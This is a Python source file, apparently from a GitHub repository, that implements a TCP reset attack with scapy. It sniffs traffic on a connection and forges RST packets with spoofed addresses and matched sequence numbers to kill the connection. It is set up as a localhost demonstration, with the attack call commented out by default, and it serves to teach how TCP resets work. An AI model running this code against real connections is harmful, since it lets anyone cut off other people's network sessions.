-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy pathmain.py
121 lines (92 loc) · 3.22 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
from scapy.all import *
import threading
import random
DEFAULT_WINDOW_SIZE = 2052
def log(msg, params={}):
formatted_params = " ".join([f"{k}={v}" for k, v in params.items()])
print(f"{msg} {formatted_params}")
def is_packet_on_tcp_conn(server_ip, server_port, client_ip):
def f(p):
return (
is_packet_tcp_server_to_client(server_ip, server_port, client_ip)(p) or
is_packet_tcp_client_to_server(server_ip, server_port, client_ip)(p)
)
return f
def is_packet_tcp_server_to_client(server_ip, server_port, client_ip):
def f(p):
if not p.haslayer(TCP):
return False
src_ip = p[IP].src
src_port = p[TCP].sport
dst_ip = p[IP].dst
return src_ip == server_ip and src_port == server_port and dst_ip == client_ip
return f
def is_packet_tcp_client_to_server(server_ip, server_port, client_ip):
def f(p):
if not p.haslayer(TCP):
return False
src_ip = p[IP].src
dst_ip = p[IP].dst
dst_port = p[TCP].dport
return src_ip == client_ip and dst_ip == server_ip and dst_port == server_port
return f
def send_reset(iface, seq_jitter=0, ignore_syn=True):
"""Set seq_jitter to be non-zero in order to prove to yourself that the
sequence number of a RST segment does indeed need to be exactly equal
to the last sequence number ACK-ed by the receiver"""
def f(p):
src_ip = p[IP].src
src_port = p[TCP].sport
dst_ip = p[IP].dst
dst_port = p[TCP].dport
seq = p[TCP].seq
ack = p[TCP].ack
flags = p[TCP].flags
log(
"Grabbed packet",
{
"src_ip": src_ip,
"dst_ip": dst_ip,
"src_port": src_port,
"dst_port": dst_port,
"seq": seq,
"ack": ack,
}
)
if "S" in flags and ignore_syn:
print("Packet has SYN flag, not sending RST")
return
# Don't allow a -ve seq
jitter = random.randint(max(-seq_jitter, -seq), seq_jitter)
if jitter == 0:
print("jitter == 0, this RST packet should close the connection")
rst_seq = ack + jitter
p = IP(src=dst_ip, dst=src_ip) / TCP(sport=dst_port, dport=src_port, flags="R", window=DEFAULT_WINDOW_SIZE, seq=rst_seq)
log(
"Sending RST packet...",
{
"orig_ack": ack,
"jitter": jitter,
"seq": rst_seq,
},
)
send(p, verbose=0, iface=iface)
return f
def log_packet(p):
"""This prints a big pile of debug information. We could make a prettier
log function if we wanted."""
return p.show()
if __name__ == "__main__":
iface = "lo0"
localhost_ip = "127.0.0.1"
localhost_server_port = 8000
log("Starting sniff...")
t = sniff(
iface=iface,
count=50,
# NOTE: uncomment `send_reset` to run the reset attack instead of
# simply logging the packet.
# prn=send_reset(iface),
prn=log_packet,
lfilter=is_packet_tcp_client_to_server(localhost_ip, localhost_server_port, localhost_ip))
log("Finished sniffing!")